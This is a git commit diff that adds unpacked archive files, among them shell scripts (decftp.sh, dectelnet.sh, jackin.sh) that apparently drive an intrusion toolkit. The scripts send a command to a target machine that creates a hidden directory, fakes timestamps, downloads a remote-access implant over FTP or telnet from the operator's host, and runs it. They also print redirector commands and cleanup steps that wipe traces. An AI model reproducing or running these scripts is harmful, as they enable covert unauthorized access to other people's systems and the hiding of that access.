Added all the files inside compressed bz2 and gz files
This commit is contained in:
parent
3381016227
commit
5cd4b51597
5375 changed files with 58370 additions and 0 deletions
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86-linux-exactchange
Executable file
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86-linux-exactchange
Executable file
Binary file not shown.
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86-linux-exactchange.static
Executable file
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86-linux-exactchange.static
Executable file
Binary file not shown.
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86_64-linux-exactchange
Executable file
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86_64-linux-exactchange
Executable file
Binary file not shown.
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86_64-linux-exactchange.static
Executable file
BIN
archive_files/EXACTCHANGE/2.2.2.1/bin/x86_64-linux-exactchange.static
Executable file
Binary file not shown.
3
archive_files/README.md
Normal file
3
archive_files/README.md
Normal file
|
@ -0,0 +1,3 @@
|
||||||
|
# Unpacked files
|
||||||
|
|
||||||
|
All the files inside compressed files (bz2 and gz).
|
34
archive_files/bin/conf.iptables
Executable file
34
archive_files/bin/conf.iptables
Executable file
|
@ -0,0 +1,34 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
#
|
||||||
|
# $Log: conf.iptables,v $
|
||||||
|
# Attempt to identify OS and actual modules needed
|
||||||
|
#
|
||||||
|
|
||||||
|
# conf.iptables
|
||||||
|
# Run this to make sure you have the proper modules installed in
|
||||||
|
# order to properly run jackladder attacks
|
||||||
|
|
||||||
|
KERNEL_VERSION=`uname -r`
|
||||||
|
|
||||||
|
case $KERNEL_VERSION in
|
||||||
|
2.4*)
|
||||||
|
[ -n "`awk '/^ipchains/ {print $1}' < /proc/modules`" ] && \
|
||||||
|
rmmod ipchains
|
||||||
|
IPTABLES=ip_tables
|
||||||
|
isthere=`awk '/^ip_tables/ {print $1}' < /proc/modules`
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
IPTABLES=iptables
|
||||||
|
isthere=`awk '/^iptables/ {print $1}' < /proc/modules`
|
||||||
|
;;
|
||||||
|
|
||||||
|
esac
|
||||||
|
[ -z "`awk '/^ip_conntrack/ {print $1}' < /proc/modules`" ] && \
|
||||||
|
/sbin/insmod ip_conntrack
|
||||||
|
[ -z "`awk '/^ip_conntrack_ftp/ {print $1}' < /proc/modules`" ] && \
|
||||||
|
/sbin/insmod ip_conntrack_ftp
|
||||||
|
[ x = x$isthere ] && \
|
||||||
|
/sbin/insmod $IPTABLES
|
||||||
|
[ -z "`awk '/^ipt_state/ {print $1}' < /proc/modules`" ] && \
|
||||||
|
/sbin/insmod ipt_state
|
BIN
archive_files/bin/connect.new.so
Executable file
BIN
archive_files/bin/connect.new.so
Executable file
Binary file not shown.
BIN
archive_files/bin/connect.so
Executable file
BIN
archive_files/bin/connect.so
Executable file
Binary file not shown.
BIN
archive_files/bin/connect.so.orig
Executable file
BIN
archive_files/bin/connect.so.orig
Executable file
Binary file not shown.
BIN
archive_files/bin/connect12.so
Executable file
BIN
archive_files/bin/connect12.so
Executable file
Binary file not shown.
72
archive_files/bin/decftp.sh
Executable file
72
archive_files/bin/decftp.sh
Executable file
|
@ -0,0 +1,72 @@
|
||||||
|
#!/bin/sh
|
||||||
|
case "${#}" in
|
||||||
|
0|1|2|4)
|
||||||
|
echo "Usage: ${0} <rem_ip> <loc_ip> <targetdir>"
|
||||||
|
echo " jl is assumed to be in ./jl"
|
||||||
|
echo " e.g. ${0} dorothy $LOCALIP /usr"
|
||||||
|
exit
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
REMOTEIP=$1
|
||||||
|
LOCALIP=$2
|
||||||
|
TARGETDIR=$3
|
||||||
|
|
||||||
|
if [ ! "$RA" = "" ]; then
|
||||||
|
echo "RA=\"$RA\""
|
||||||
|
fi
|
||||||
|
if [ ! "$RP" = "" ]; then
|
||||||
|
echo "RP=\"$RP\""
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo CommandLine: ${0} ${*}
|
||||||
|
|
||||||
|
#1 on line below is for F version. Use 2 for D version
|
||||||
|
REALCMD="N=/dev/null
|
||||||
|
D=$TARGETDIR/.advtags
|
||||||
|
PATH=\$D:/bin:/usr/bin
|
||||||
|
echo \"locked\" > /tmp/.advtag_resource
|
||||||
|
touch -r $TARGETDIR /tmp/.advtag_resource
|
||||||
|
mkdir \$D
|
||||||
|
cd \$D
|
||||||
|
ftp -in<<E >\$N 2>&1
|
||||||
|
open $LOCALIP
|
||||||
|
user anon o
|
||||||
|
bi
|
||||||
|
get pmgrd.Z
|
||||||
|
E
|
||||||
|
uncompress pmgrd.Z >\$N 2>&1
|
||||||
|
chmod +x pmgrd
|
||||||
|
pmgrd
|
||||||
|
exit 0"
|
||||||
|
export REALCMD
|
||||||
|
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo ""
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo ""
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
echo "REALCMD=\"$REALCMD\""
|
||||||
|
echo ""
|
||||||
|
echo "Command about to be executed:"
|
||||||
|
echo " ./jl.command telnet $REMOTEIP $JLPORT"
|
||||||
|
echo ""
|
||||||
|
PLATFORM=`uname`
|
||||||
|
if [ "$PLATFORM" = "Linux" ]; then
|
||||||
|
MINUSN=-n
|
||||||
|
else
|
||||||
|
MINUSN=""
|
||||||
|
fi
|
||||||
|
echo $MINUSN "Hit enter to proceed, ^C to not: "
|
||||||
|
|
||||||
|
read junk
|
||||||
|
|
||||||
|
#now run jackladder
|
||||||
|
#cfgmgr
|
||||||
|
REMOTEPORT=10402
|
||||||
|
#mail
|
||||||
|
#REMOTEPORT=25
|
||||||
|
|
||||||
|
./jl.command telnet $REMOTEIP $REMOTEPORT
|
228
archive_files/bin/dectelnet.sh
Executable file
228
archive_files/bin/dectelnet.sh
Executable file
|
@ -0,0 +1,228 @@
|
||||||
|
#!/bin/sh
|
||||||
|
COLOR_NORMAL="\\033[0;39m"
|
||||||
|
SETCOLOR_NORMAL="echo -en $COLOR_NORMAL"
|
||||||
|
COLOR_NOTE="\\033[0;34m"
|
||||||
|
SETCOLOR_NOTE="echo -en $COLOR_NOTE"
|
||||||
|
SYNTAX="<rem_ip> <loc_ip> <localport> <basedir> \\
|
||||||
|
<rat_file> [<jl_port>] [<worksubdir>] [<rat_port> [nosy] ]"
|
||||||
|
DEFJLPORT=13
|
||||||
|
PROG=`basename ${0}`
|
||||||
|
usage () {
|
||||||
|
echo "
|
||||||
|
Usage: [RA=redirector-address RP=redirector-port] $PROG \\
|
||||||
|
$SYNTAX
|
||||||
|
* RA and RP required if redirecting JL with jackpop
|
||||||
|
* jl is assumed to be in ./jl
|
||||||
|
* jl_port defaults to $DEFJLPORT (arg required if next arg is used)
|
||||||
|
* rat_port optional - default used if not given. BUT--if rat_port is
|
||||||
|
given and nopen is not being used, the final argument must be
|
||||||
|
nosy to send the older syntax up.
|
||||||
|
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /usr pmgrd 10402 .advtags 33433
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /usr pmgrd 10402 .advtags 33433 nosy
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /usr pmgrd 10402 .advtags
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /usr pmgrd 10402
|
||||||
|
e.g. $PROG alice LOCALIP 32177 /usr pmgrd
|
||||||
|
|
||||||
|
NOTE: You may now pre-set any/all of the following environment
|
||||||
|
variables if using jackpop with $PROG (RA & RP required).
|
||||||
|
|
||||||
|
For jl.command
|
||||||
|
locally: RA=redirector-address RP=redirector-port
|
||||||
|
|
||||||
|
For jackpop on LP=same-as-RP SA=your-source-IP
|
||||||
|
redirector: TA=target-address TP=target-JL-port
|
||||||
|
|
||||||
|
If you do not set LP and/or SA, they will be determined
|
||||||
|
by the <jl_port> parameter and ifconfig. You will be prompted
|
||||||
|
for TA and TP if they are not already set.
|
||||||
|
"
|
||||||
|
exit
|
||||||
|
}
|
||||||
|
|
||||||
|
case "${#}" in
|
||||||
|
0|1|2|3|4)
|
||||||
|
usage
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
REMOTEIP=$1
|
||||||
|
LOCALIP=$2
|
||||||
|
LOCALPORT=$3
|
||||||
|
BASEDIR=$4
|
||||||
|
RAT_FILE=$5
|
||||||
|
JLPORT=$6
|
||||||
|
WORKSUBDIR=$7
|
||||||
|
RAT_PORT=$8
|
||||||
|
RAT_NAME=$9
|
||||||
|
|
||||||
|
[ "$RAT_NAME" ] || RAT_NAME=nopen
|
||||||
|
|
||||||
|
PLATFORM=`uname`
|
||||||
|
if [ "$PLATFORM" = "Linux" ]; then
|
||||||
|
MINUSN=-n
|
||||||
|
else
|
||||||
|
MINUSN=""
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ "$JLPORT" = "" ]; then
|
||||||
|
JLPORT=$DEFJLPORT
|
||||||
|
fi
|
||||||
|
if [ "$WORKSUBDIR" = "" ]; then
|
||||||
|
WORKSUBDIR=.advtags
|
||||||
|
fi
|
||||||
|
if [ "$RAT_PORT" != "" ]; then
|
||||||
|
if [ $RAT_PORT -lt 1025 -o $RAT_PORT -gt 65535 ]; then
|
||||||
|
echo rat_port must be between 1025 and 65535, inclusive
|
||||||
|
echo ""
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
if [ "$RAT_NAME" = "nosy" ]; then
|
||||||
|
RAT_ARG="P=$RAT_PORT "
|
||||||
|
else
|
||||||
|
if [ "$RAT_NAME" = "nopen" ]; then
|
||||||
|
RAT_ARG="D=\"-l $RAT_PORT\" "
|
||||||
|
if [ ! "`../bin/noclient | grep '2\.5'`" = "" ] ; then
|
||||||
|
RAT_ARG="D=\"-l $RAT_PORT\" "
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo rat_name $RAT_NAME is not nosy or nopen
|
||||||
|
echo ""
|
||||||
|
usage
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
RAT_ARG=""
|
||||||
|
fi
|
||||||
|
|
||||||
|
JACKPOP=0
|
||||||
|
|
||||||
|
if [ ! "$RA" = "" ] || [ ! "$RP" = "" ] ; then
|
||||||
|
JACKPOP=1
|
||||||
|
if [ "$RA" = "" ] || [ "$RP" = "" ] ; then
|
||||||
|
echo "FATAL ERROR: Must have BOTH environment variables RA and RP set."
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
if [ ! "$RP" = "$JLPORT" ] ; then
|
||||||
|
echo "Shouldn't RP=JLPORT?
|
||||||
|
(you have RP=$RP and JLPORT=$JLPORT)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
if [ ! "$RA" = "$REMOTEIP" ] || [ ! "$RA" = "$LOCALIP" ] ; then
|
||||||
|
echo "Shouldn't RA=LOCALIP=REMOTEIP? (you have
|
||||||
|
RA=$RA, LOCALIP=$LOCALIP
|
||||||
|
and REMOTEIP=$REMOTEIP)"
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
fi
|
||||||
|
if [ ! "$TA" ] ; then
|
||||||
|
DEFTARGETIP=`egrep "^Target IP:" /current/etc/opscript.txt | awk '{print $3}' | head -1`
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the IP of your actual target you are redirecting
|
||||||
|
through $REMOTEIP to get to (this is used here to echo
|
||||||
|
a jackpop command to paste into your redirector): [$DEFTARGETIP]"
|
||||||
|
read TA
|
||||||
|
[ "$TA" ] || TA=$DEFTARGETIP
|
||||||
|
fi
|
||||||
|
echo ""
|
||||||
|
if [ ! "$TP" ] ; then
|
||||||
|
echo $MINUSN "
|
||||||
|
Enter the actual target's JL trigger port (this is used here
|
||||||
|
to echo a jackpop command to paste into your redirector): [$DEFJLPORT] "
|
||||||
|
read TP
|
||||||
|
[ "$TP" ] || TP=$DEFJLPORT
|
||||||
|
fi
|
||||||
|
if [ ! "$LP" ] ; then
|
||||||
|
LP=$RP
|
||||||
|
fi
|
||||||
|
|
||||||
|
LOCAL_IP_GUESS=`ifconfig ppp0 2>/dev/null | grep inet | grep -v grep | grep -v ":127\." | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
# if that fails maybe it's on eth0
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || LOCAL_IP_GUESS=`ifconfig -a eth0 | grep inet | grep -v grep | awk '{print $2}' | cut -d ":" -f 2`
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || echo "Unable to get local IP address..bailing"
|
||||||
|
[ "$LOCAL_IP_GUESS" ] || exit 1
|
||||||
|
|
||||||
|
if [ "$SA" ] ; then
|
||||||
|
if [ ! "$SA" = "$LOCAL_IP_GUESS" ] ; then
|
||||||
|
echo "Shouldn't SA=LOCAL_IP_GUESS? (you have
|
||||||
|
SA=$SA and the local IP appears to be
|
||||||
|
$LOCAL_IP_GUESS."
|
||||||
|
echo $MINUSN "
|
||||||
|
Hit ^C to abort and fix this or hit enter to continue
|
||||||
|
(though that would most likely not work)."
|
||||||
|
read quitans
|
||||||
|
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
SA=$LOCAL_IP_GUESS
|
||||||
|
fi
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "
|
||||||
|
CommandLine: $PROG ${*}"
|
||||||
|
|
||||||
|
REALCMD="N=/dev/null
|
||||||
|
D=$BASEDIR/.advtags
|
||||||
|
PATH=\$D:/bin:/usr/bin
|
||||||
|
touch -r $BASEDIR /tmp/.advt
|
||||||
|
mkdir \$D
|
||||||
|
cd \$D
|
||||||
|
(telnet $LOCALIP $LOCALPORT < /dev/console 2> /dev/null) | cat > $RAT_FILE.uu
|
||||||
|
uudecode $RAT_FILE.uu
|
||||||
|
uncompress -f $RAT_FILE.Z >\$N 2>&1 && chmod +x $RAT_FILE
|
||||||
|
${RAT_ARG}${RAT_FILE}
|
||||||
|
rm -f \$D/$RAT_FILE \$D/$RAT_FILE.uu
|
||||||
|
exit 0"
|
||||||
|
|
||||||
|
export REALCMD
|
||||||
|
|
||||||
|
echo ""
|
||||||
|
echo ""
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo ""
|
||||||
|
echo "New order of arguments is: "
|
||||||
|
echo "$PROG $SYNTAX"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
echo "REALCMD=\"$REALCMD\""
|
||||||
|
echo ""
|
||||||
|
echo "Command about to be executed:"
|
||||||
|
echo " ./jl.command telnet $REMOTEIP $JLPORT"
|
||||||
|
echo ""
|
||||||
|
|
||||||
|
if [ "$JACKPOP" = 1 ] ; then
|
||||||
|
echo "
|
||||||
|
Using jackpop with environment variables as follows:
|
||||||
|
Redirector Address RA=$RA
|
||||||
|
Redirector Port RP=$RP
|
||||||
|
Target Address TA=$TA
|
||||||
|
Target Port TP=$TP
|
||||||
|
Listening Port on RA LP=$LP
|
||||||
|
Source Address SA=$SA
|
||||||
|
|
||||||
|
Now, some pastables. First, the jackpop command you need to run in an
|
||||||
|
INCISION window on $RA, then the -rtun command in a NOPEN window
|
||||||
|
on the same box, and finally an rm command to wipe jackpop: "
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo "
|
||||||
|
chmod 700 jp&&netstat -an|grep $LP||PATH=. SA=$SA TA=$TA TP=$TP LP=$LP jp
|
||||||
|
|
||||||
|
rm jp ; ls -al ; ls -al jp
|
||||||
|
|
||||||
|
-rtun $LOCALPORT
|
||||||
|
"
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
fi
|
||||||
|
echo "CHECK SYNTAX IN REALCMD AND IN jl.command LINE BEFORE CONTINUING"
|
||||||
|
echo $MINUSN "hit enter to proceed, ^C to not: "
|
||||||
|
|
||||||
|
read junk
|
||||||
|
|
||||||
|
#now run jackladder
|
||||||
|
|
||||||
|
./jl.command telnet $REMOTEIP $JLPORT
|
1
archive_files/bin/initial.fill
Normal file
1
archive_files/bin/initial.fill
Normal file
|
@ -0,0 +1 @@
|
||||||
|
?<疹ムぽヲ?<3F>
|
594
archive_files/bin/jackin.sh
Executable file
594
archive_files/bin/jackin.sh
Executable file
|
@ -0,0 +1,594 @@
|
||||||
|
#!/bin/sh
|
||||||
|
COLOR_SUCCESS="\\033[1;32m"
|
||||||
|
COLOR_FAILURE="\\033[1;31m"
|
||||||
|
COLOR_WARNING="\\033[1;33m"
|
||||||
|
COLOR_NORMAL="\\033[0;39m"
|
||||||
|
COLOR_NOTE="\\033[0;34m"
|
||||||
|
SETCOLOR_SUCCESS="echo -en $COLOR_SUCCESS"
|
||||||
|
SETCOLOR_FAILURE="echo -en $COLOR_FAILURE"
|
||||||
|
SETCOLOR_WARNING="echo -en $COLOR_WARNING"
|
||||||
|
SETCOLOR_NORMAL="echo -en $COLOR_NORMAL"
|
||||||
|
SETCOLOR_NOTE="echo -en $COLOR_NOTE"
|
||||||
|
DEFJLPORT=13
|
||||||
|
DEFRATNAME=sendmail
|
||||||
|
DEFDIR="/tmp/.scsi"
|
||||||
|
PROG=`basename ${0}`
|
||||||
|
NOPENCALLBACKDELAY=30
|
||||||
|
VER=3.2
|
||||||
|
note() {
|
||||||
|
if [ "$1" = "-n" ] ; then
|
||||||
|
N=$1
|
||||||
|
shift
|
||||||
|
fi
|
||||||
|
echo -e $N "$COLOR_NOTE${*}$COLOR_NORMAL"
|
||||||
|
}
|
||||||
|
notered() {
|
||||||
|
if [ "$1" = "-n" ] ; then
|
||||||
|
N=$1
|
||||||
|
shift
|
||||||
|
fi
|
||||||
|
echo -e $N "$COLOR_FAILURE${*}$COLOR_NORMAL"
|
||||||
|
}
|
||||||
|
checkip() {
|
||||||
|
CHECKIP=$1
|
||||||
|
ERRSTR=$2
|
||||||
|
until [ `echo $CHECKIP | grepip 2>/dev/null` ] ; do
|
||||||
|
if [ "$CHECKIP" ] ; then
|
||||||
|
CHECKIP=`host $CHECKIP | awk '{print $4}'`
|
||||||
|
continue
|
||||||
|
fi
|
||||||
|
[ "$CHECKIP" ] && notered Bad IP $CHECKIP
|
||||||
|
echo -en "\nEnter Local IP for rat upload/callback or ^C to abort: "
|
||||||
|
read CHECKIP
|
||||||
|
done
|
||||||
|
|
||||||
|
}
|
||||||
|
SYNTAX="-i <rem_ip> [-l <loc_ip>] [-D <targetdir>] [-r <rat_name>] \\
|
||||||
|
[-n <localport>] [-I <icmp_type> | -j <jl_port>] [-t nosy]"
|
||||||
|
usage() {
|
||||||
|
[ "$1" = "exit" ] && EXIT=1 && shift
|
||||||
|
if [ "$1" = "-h" ] ; then
|
||||||
|
SHOWVER=1
|
||||||
|
shift
|
||||||
|
$SETCOLOR_NOTE
|
||||||
|
echo -e "
|
||||||
|
Usage:
|
||||||
|
[TA=target-address TP=target-port \\
|
||||||
|
RA=redirector-address RP=redirector-port] \\
|
||||||
|
$PROG -i <rem_ip> [ options ]
|
||||||
|
|
||||||
|
OR IN TROUBLESHOOT MODE
|
||||||
|
[TA=target-address TP=target-port \\
|
||||||
|
RA=redirector-address RP=redirector-port] \\
|
||||||
|
$PROG [-T|R|B|1|2|3] -i <rem_ip> [-j <jl_port>]
|
||||||
|
|
||||||
|
OPTIONS - Upload and Execute Mode
|
||||||
|
-i IP IP of target machine (REQUIRED--NO DEFAULT)
|
||||||
|
-j # TCP JL port on target (Default: $DEFJLPORT)
|
||||||
|
-l IP IP of attack machine (Default: the first active IP found in
|
||||||
|
this order: ppp0, ppp1, eth0 or eth1)
|
||||||
|
-n # rat upload port (Default: a random port)
|
||||||
|
-p # Use port # for RAT listen/callback. (Default: random number)
|
||||||
|
is generated and used.
|
||||||
|
-s # Change delay used for -c to # seconds (must appear before -c).
|
||||||
|
-c Use NOPEN syntax to have RAT callback to localip after a delay
|
||||||
|
(default is $NOPENCALLBACKDELAY seconds). Port is random unless -p used.
|
||||||
|
-C IP Use NOPEN callback to IP instead of local. Port same as in -c.
|
||||||
|
-z Do NOT use compress/uncomrpess at the either end.
|
||||||
|
-r rat name of rat on target (Default: sendmail)
|
||||||
|
-D dir directory to work from/create on target (Default = /tmp/.scsi)
|
||||||
|
-q disables \"confirm syntax\" prompt
|
||||||
|
-I # use ICMP type # as trigger (e.g., 8, 17, etc.)
|
||||||
|
-t rat Type of rat: either nosy or nopen. (Default: nopen)
|
||||||
|
|
||||||
|
OPTIONS - Troubleshooting Mode
|
||||||
|
-1 executes \"w ; ls -alR /tmp ; df -k\" instead of the usual
|
||||||
|
-2 executes \"w ; netstat -an | egrep '(LISTEN|SYN_SENT)'\"
|
||||||
|
-3 executes \"w ; which mkdir telnet cat uudecode uncompress chmod ls netstat egrep $DEFRATNAME\"
|
||||||
|
-R REDO in callback mode. If upload works but cannot connect.
|
||||||
|
executes \"cd \$TARGETDIR || cd /tmp ; PATH=\$TARGETDIR D=-c\$LOCALIP:\$NOPENPORT \${DOTSLASH}\${RAT_NAME}\"
|
||||||
|
-B BAIL, executes \"ls -alrt /tmp ; ls -alR \$TARGETDIR ; rm -rf \$TARGETDIR ; ls -arlt /tmp ; ls -alR $TARGETDIR\"
|
||||||
|
-T You are prompted for what commands to run at remote end.
|
||||||
|
|
||||||
|
* Up-arrow and add -R Troubleshoot option if upload works but you
|
||||||
|
cannot get to NOPEN listener started. This uses the already uploaded
|
||||||
|
NOPEN in callback mode. Be sure to kill the listening NOPEN.
|
||||||
|
* Up-arrow and add -B if you still cannot get on but you think you've
|
||||||
|
left a dirty \$TARGETDIR.
|
||||||
|
* $PROG calls packrat to upload NOPEN
|
||||||
|
* If localport is omitted, $PROG chooses a random one
|
||||||
|
* dir defaults to $DEFDIR
|
||||||
|
* RA and RP required if redirecting JL with jackpop
|
||||||
|
* if RA/RP are provided without TA/TP you are prompted for TA/TP
|
||||||
|
* jl is assumed to be in ./jl
|
||||||
|
* jl_port defaults to $DEFJLPORT
|
||||||
|
|
||||||
|
USE WITH jackpop:
|
||||||
|
You may pre-set any/all of the following environment
|
||||||
|
variables if using jackpop with $PROG (RA & RP required).
|
||||||
|
|
||||||
|
For jl.command
|
||||||
|
locally: RA=redirector-address RP=redirector-port
|
||||||
|
|
||||||
|
For jackpop on LP=same-as-RP SA=your-source-IP
|
||||||
|
redirector: TA=target-address TP=target-JL-port
|
||||||
|
|
||||||
|
If you do not set LP and/or SA, they will be determined by the
|
||||||
|
<jl_port> parameter or default and ifconfig.
|
||||||
|
|
||||||
|
If you do not set TA and/or TP, you will be prompted for them.
|
||||||
|
"
|
||||||
|
fi
|
||||||
|
if [ "$SHOWVER" -o "$1" = "-v" ] ; then
|
||||||
|
echo -e "$PROG version $VER"
|
||||||
|
shift
|
||||||
|
fi
|
||||||
|
$SETCOLOR_NORMAL
|
||||||
|
ERRSTR="${*}"
|
||||||
|
if [ "$ERRSTR" ] ; then
|
||||||
|
notered "\a${ERRSTR}"
|
||||||
|
fi
|
||||||
|
[ "$EXIT" ] && exit
|
||||||
|
} # end usage
|
||||||
|
|
||||||
|
CMDLINE="\nCommandLine: ${0} ${*}"
|
||||||
|
|
||||||
|
[ "${*}" ] || usage exit -h
|
||||||
|
|
||||||
|
# this is default but may get shut off with -z arg
|
||||||
|
UNCOMPRESS="yes"
|
||||||
|
|
||||||
|
while getopts 123RazqvVhHI:cp:s:zTi:l:D:r:n:j:t:PC:B op ; do
|
||||||
|
case $op in
|
||||||
|
1) DOCMD="
|
||||||
|
PATH=$TARGETDIR:/tmp:/bin:/usr/bin:/sbin:/usr/sbin:/usr/bsd ; w ; ls -alR /tmp ; df -k";;
|
||||||
|
2) DOCMD="
|
||||||
|
PATH=$TARGETDIR:/tmp:/bin:/usr/bin:/sbin:/usr/sbin:/usr/bsd ; w ; netstat -an | egrep \"(LISTEN|SYN_SENT)\"";;
|
||||||
|
3) DOCMD="
|
||||||
|
PATH=$TARGETDIR:/tmp:/bin:/usr/bin:/sbin:/usr/sbin:/usr/bsd ; w ; which mkdir telnet cat uudecode uncompress chmod ls netstat egrep";;
|
||||||
|
B|R) DOCMD="-$op"
|
||||||
|
NOPENCALLBACK=" callback"
|
||||||
|
REDO="-$op";;
|
||||||
|
T) note "Enter Command(s) to run on target:"
|
||||||
|
read DOCMD
|
||||||
|
note "You entered:\n$DOCMD\n";;
|
||||||
|
a) AUTOCMD=1
|
||||||
|
usage exit "The \"-a\" feature is disabled";;
|
||||||
|
q) QUIET=1;;
|
||||||
|
D) E=$OPTARG;;
|
||||||
|
h|v) usage exit -$op ;;
|
||||||
|
I) ICMPTRIGGER=$OPTARG;;
|
||||||
|
c) NOPENCALLBACK=" callback";;
|
||||||
|
C) NOPENCALLBACKIP=$OPTARG
|
||||||
|
NOPENCALLBACK=" callback";;
|
||||||
|
p) NOPENPORT=$OPTARG;;
|
||||||
|
s) NOPENCALLBACKDELAY=$OPTARG;;
|
||||||
|
z) NOZIP=yes
|
||||||
|
UNCOMPRESS=""
|
||||||
|
PACKARGS=" -z" ;;
|
||||||
|
i) REMOTEIP=$OPTARG ;;
|
||||||
|
l) LOCALIP=$OPTARG ;;
|
||||||
|
D) TARGETDIR=$OPTARG ;;
|
||||||
|
r) RAT_NAME=$OPTARG ;;
|
||||||
|
n) LOCAL_PORT=$OPTARG ;;
|
||||||
|
P) DOTSLASH="./";;
|
||||||
|
j) JLPORT=$OPTARG ;;
|
||||||
|
t) RAT_TYPE=$OPTARG ;;
|
||||||
|
*) usage exit "Unrecognized argument $1";;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
shift `expr $OPTIND - 1`
|
||||||
|
echo -e "$CMDLINE"
|
||||||
|
if [ ! "$NOPENPORT" ] ; then
|
||||||
|
NOPENPORT=`mkrandom -n 2>/dev/null`
|
||||||
|
fi
|
||||||
|
if [ ! "$NOPENPORT" ] ; then
|
||||||
|
usage exit "mkrandom not in path--needed to generate random port for NOPEN\n(use -p # to force a particular port)"
|
||||||
|
fi
|
||||||
|
# If DOCMD is set now we're doing a short session--no callback
|
||||||
|
[ "$DOCMD" ] && [ ! "$REDO" ] && SHORTARGS=1
|
||||||
|
[ "$DOCMD" ] && SHORTARGS=1
|
||||||
|
[ "${TARGETDIR}" ] || TARGETDIR=$DEFDIR
|
||||||
|
|
||||||
|
if [ ! $SHORTARGS ] ; then
|
||||||
|
[ "$REMOTEIP" ] || usage exit "-i <remoteip> is required"
|
||||||
|
if [ ! "$LOCALIP" ] ; then
|
||||||
|
if [ ! "`which grepip 2>/dev/null`" ] ; then
|
||||||
|
usage exit "\aMust have \"grepip\" in path or provide -l IP on command line"
|
||||||
|
fi
|
||||||
|
for INT in ppp0 ppp1 eth0 eth1 ; do
|
||||||
|
ADDR=`ifconfig $INT 2>/dev/null | grepip | egrep -v "255|127\.0" | head -1`
|
||||||
|
[ "$ADDR" ] && LOCALIP=$ADDR
|
||||||
|
[ "$LOCALIP" ] && break
|
||||||
|
done
|
||||||
|
INT=" ($INT)"
|
||||||
|
while [ ! "$LOCALIP" ] ; do
|
||||||
|
INT=""
|
||||||
|
echo -en "What is your local/redirector IP address? "
|
||||||
|
[ "$LOCALIP" ] && echo -en "[$LOCALIP] "
|
||||||
|
read ans
|
||||||
|
[ "$ans" -a "${ans:0:1}" != "y" -a "${ans:0:1}" != "Y" ] && \
|
||||||
|
LOCALIP=$ans
|
||||||
|
LOCALIP=`echo $LOCALIP | grepip`
|
||||||
|
[ "$ans" ] && echo -e "\n\n\a$ans is not a valid IP. Try again.\n\n"
|
||||||
|
done
|
||||||
|
note "Using $LOCALIP$INT for -l local IP argument"
|
||||||
|
fi
|
||||||
|
|
||||||
|
until [ `echo $LOCALIP | grepip 2>/dev/null` ] ; do
|
||||||
|
if [ "$LOCALIP" ] ; then
|
||||||
|
LOCALIP=`host $LOCALIP | awk '{print $4}'`
|
||||||
|
continue
|
||||||
|
fi
|
||||||
|
[ "$LOCALIP" ] && notered Bad IP $LOCALIP
|
||||||
|
echo -en "\nEnter Local IP for rat upload/callback or ^C to abort: "
|
||||||
|
read LOCALIP
|
||||||
|
done
|
||||||
|
until [ `echo $REMOTEIP | grepip 2>/dev/null` ] ; do
|
||||||
|
if [ "$REMOTEIP" ] ; then
|
||||||
|
REMOTEIP=`host $REMOTEIP | awk '{print $4}'`
|
||||||
|
continue
|
||||||
|
fi
|
||||||
|
[ "$REMOTEIP" ] && notered Bad IP $REMOTEIP
|
||||||
|
echo -en "\nEnter Remote IP or ^C to abort: "
|
||||||
|
read REMOTEIP
|
||||||
|
done
|
||||||
|
if [ "$NOPENCALLBACKIP" ] ; then
|
||||||
|
until [ `echo $NOPENCALLBACKIP | grepip 2>/dev/null` ] ; do
|
||||||
|
if [ "$NOPENCALLBACKIP" ] ; then
|
||||||
|
NOPENCALLBACKIP=`host $NOPENCALLBACKIP | awk '{print $4}'`
|
||||||
|
continue
|
||||||
|
fi
|
||||||
|
[ "$NOPENCALLBACKIP" ] && notered Bad -C NOPEN callback IP $NOPENCALLBACKIP
|
||||||
|
echo -en "\nEnter NOPEN callback IP or ^C to abort: "
|
||||||
|
read NOPENCALLBACKIP
|
||||||
|
done
|
||||||
|
fi
|
||||||
|
[ "$RAT_NAME" ] || RAT_NAME=$DEFRATNAME
|
||||||
|
|
||||||
|
if [ "$ARCH" ] ; then
|
||||||
|
